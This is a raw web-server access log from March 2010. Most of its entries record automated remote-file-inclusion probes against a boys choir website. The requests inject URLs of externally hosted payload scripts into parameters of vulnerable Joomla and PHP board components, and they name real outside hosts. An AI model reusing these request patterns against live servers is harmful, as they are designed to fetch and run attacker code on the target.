220.80.108.81 - - [09/Mar/2010:05:01:39 -0800] "GET /skin/zero_vote/error.php?dir=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:05:02:19 -0800] "GET /logs/access_100214.log%20%20//skin/zero_vote/error.php?dir=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:05:03:01 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
110.45.145.178 - - [09/Mar/2010:05:03:03 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:05:03:26 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:05:03:26 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:05:03:27 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.195.115.217 - - [09/Mar/2010:05:03:32 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:05:03:33 -0800] "GET /logs/access_100214.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.210.178 - - [09/Mar/2010:05:03:45 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.210.178 - - [09/Mar/2010:05:03:45 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.210.178 - - [09/Mar/2010:05:03:45 -0800] "GET /logs/access_100205.log%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:05:04:02 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:05:04:02 -0800] "GET /logs/access_100117.log//agendax/addevent.inc.php?agendax_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:05:04:02 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:05:04:11 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:05:04:27 -0800] "GET /logs/access_091111.log//agendax/addevent.inc.php?agendax_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:05:04:40 -0800] "GET /logs/access_100126.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:05:04:44 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.32.68.153 - - [09/Mar/2010:05:05:28 -0800] "GET /logs/access_091111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.32.68.153 - - [09/Mar/2010:05:05:28 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.32.68.153 - - [09/Mar/2010:05:05:29 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.17.201.144 - - [09/Mar/2010:05:07:32 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.17.201.144 - - [09/Mar/2010:05:07:32 -0800] "GET /logs/access_091111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.17.201.144 - - [09/Mar/2010:05:07:32 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:05:08:48 -0800] "GET /logs//nologa/board/delete_all.php?board_skin_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:05:08:48 -0800] "GET /nologa/board/delete_all.php?board_skin_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:05:08:48 -0800] "GET /logs/access_100202.log%20%20//nologa/board/delete_all.php?board_skin_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:05:14:08 -0800] "GET /logs/access_100210.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.222.43 - - [09/Mar/2010:05:18:44 -0800] "GET /?INCLUDE_FOLDER=http://bk21.changwon.ac.kr/board/test.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.americanboyschoir.com"
66.7.222.43 - - [09/Mar/2010:05:18:44 -0800] "GET /logs/?INCLUDE_FOLDER=http://bk21.changwon.ac.kr/board/test.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.americanboyschoir.com"
193.111.95.42 - - [09/Mar/2010:05:18:45 -0800] "GET /?INCLUDE_FOLDER=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 200 1724 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.americanboyschoir.com"
193.111.95.42 - - [09/Mar/2010:05:18:45 -0800] "GET /logs/?INCLUDE_FOLDER=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 200 1081 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.americanboyschoir.com"
67.195.115.217 - - [09/Mar/2010:05:19:48 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
67.195.115.217 - - [09/Mar/2010:05:20:18 -0800] "GET /?D=A HTTP/1.0" 200 1708 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
207.46.199.41 - - [09/Mar/2010:05:20:20 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.americanboyschoir.com"
207.46.199.41 - - [09/Mar/2010:05:21:31 -0800] "GET /logs/?S=A HTTP/1.1" 200 1081 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.americanboyschoir.com"
67.195.115.217 - - [09/Mar/2010:05:24:20 -0800] "GET /xxxxxxx/?M=A HTTP/1.0" 200 923 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:29:02 -0800] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:29:02 -0800] "GET /logs/access_091213.log///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:29:02 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:05:29:06 -0800] "GET /logs/access_100210.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:29:25 -0800] "GET /logs/access_100228.log///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:30:02 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:30:02 -0800] "GET /logs/access_091213.log///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:30:02 -0800] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:30:21 -0800] "GET /logs/access_100228.log///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:32:21 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:32:21 -0800] "GET /logs/access_091213.log%20%20///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:32:21 -0800] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.145.31.239 - - [09/Mar/2010:05:32:31 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.145.31.239 - - [09/Mar/2010:05:32:31 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.145.31.239 - - [09/Mar/2010:05:32:31 -0800] "GET /logs/access_091029.log//bbs//skin/zero_vote/ask_password.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:32:47 -0800] "GET /logs/access_100228.log%20%20///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:33:06 -0800] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:33:06 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:33:06 -0800] "GET /logs/access_100228.log///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:33:07 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:33:07 -0800] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:33:07 -0800] "GET /logs/access_100228.log///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:33:38 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:33:38 -0800] "GET /logs/access_091213.log%20%20///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:33:38 -0800] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:34:30 -0800] "GET /logs/access_100228.log%20%20///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:35:04 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:35:04 -0800] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:35:04 -0800] "GET /logs/access_100228.log%20%20///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:35:40 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:35:40 -0800] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:05:35:40 -0800] "GET /logs/access_100228.log%20%20///tools/send_reminders.php?noSet=0&includedir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:05:37:55 -0800] "GET /bbs/delete_all.php?board_skin_path=? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:05:43:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:05:43:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:05:43:20 -0800] "GET /logs/access_100214.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:43:40 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:43:40 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:43:40 -0800] "GET /logs/access_091229.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:05:43:43 -0800] "GET /download.php?board_skin_path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:05:43:43 -0800] "GET /logs//download.php?board_skin_path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:05:44:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:05:44:15 -0800] "GET /logs/access_100214.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:05:44:15 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:44:28 -0800] "GET /logs/access_100205.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:05:46:44 -0800] "GET /logs/access_100205.log//bbs/delete_all.php?board_skin_path=? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:05:46:44 -0800] "GET /bbs/delete_all.php?board_skin_path=? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:05:46:45 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:47:13 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:47:13 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:47:13 -0800] "GET /logs/access_091229.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:05:47:45 -0800] "GET /bbs/delete_all.php?board_skin_path=? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:48:11 -0800] "GET /logs/access_100205.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:48:27 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:48:27 -0800] "GET /logs/access_091229.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:48:27 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:48:53 -0800] "GET /logs/access_100228.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:50:14 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:50:14 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:50:14 -0800] "GET /logs/access_091229.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:50:58 -0800] "GET /logs/access_100205.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:05:52:50 -0800] "GET /logs/access_100214.log/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:05:52:50 -0800] "GET /logs/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:05:52:50 -0800] "GET /?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:05:52:50 -0800] "GET /logs/access.log/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.55.227.145 - - [09/Mar/2010:05:55:13 -0800] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.55.227.145 - - [09/Mar/2010:05:55:13 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.55.227.145 - - [09/Mar/2010:05:55:13 -0800] "GET /logs/access_100130.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.55.227.145 - - [09/Mar/2010:05:55:21 -0800] "GET /logs/access_100210.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
121.88.4.74 - - [09/Mar/2010:05:56:00 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.americanboyschoir.com"
121.88.4.74 - - [09/Mar/2010:05:56:00 -0800] "GET /logs/access_091111.log//?_SERVER[DOCUMENT_ROOT]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
